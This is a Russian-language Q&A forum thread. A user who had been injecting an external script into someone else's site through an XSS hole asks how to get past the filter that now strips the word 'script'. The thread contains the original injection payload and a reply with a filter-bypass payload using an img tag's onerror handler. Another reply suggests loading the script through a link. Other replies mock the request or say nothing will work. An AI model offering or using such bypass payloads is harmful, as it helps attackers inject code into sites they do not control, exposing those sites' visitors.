Чем заменить script?

Question

[NO1nam]

Раньше использовал так "><script scr=http://site.com/script.js></script>
но теперь сайт сделали фильтр и убирает script из адрес сайта чем можно заменить script ? что бы работало так же XSS

Comments

[Шохрух Шаймардонов]

Ничего не понял, если честно

[Одиночка Айс]

Ну так отмените то, чего там нахимичили

[Alams Stoyne]

Я так понимаю это какой-то облачный конструктор сайтов?

[Пашенька]

Шохрух Шаймардонов, товарищ использовал уязвимость некоторого сайта к XSS, теперь дырочку прикрыли, он обломался и не знает, чьто сейчас делоть :(

[Шохрух Шаймардонов]

like-a-boss, ну и пусть куда дальше идёт товарищь

Answer 1

[Aetae]

Если закрывали те же криворучки, что писали и первую версию, то может прокатить: "><img src="" onerror="alert(1)">.

Answer 2

[Karpion]

Переименуйте файл со скриптом.

Comments

[NO1nam]

сам<script></script> удаляет остаётся так"><scr=http://site.com/xxx.js></>

[Karpion]

NO1nam, Вы написали

убирает script из адрес сайта

Про удаление тэгов Вы ничего не говорили.

Против такого фильтра, если он сделан качественно - ничего не поможет.

Ну, можно попробовать не инклюдить JS-скрипт в HTML-страницу, а запускать сразу JS-скрипт по ссылке типа <A HREF=http://site.com/script.js> - при клике загрузится скрипт, который сам "напишет" в текущее окно HTML.

Может, сменить сайт, раз на этом JS запретили? Ну или договорить с админом, можно за пиво.

Answer 3

[Sashqa]

Ничем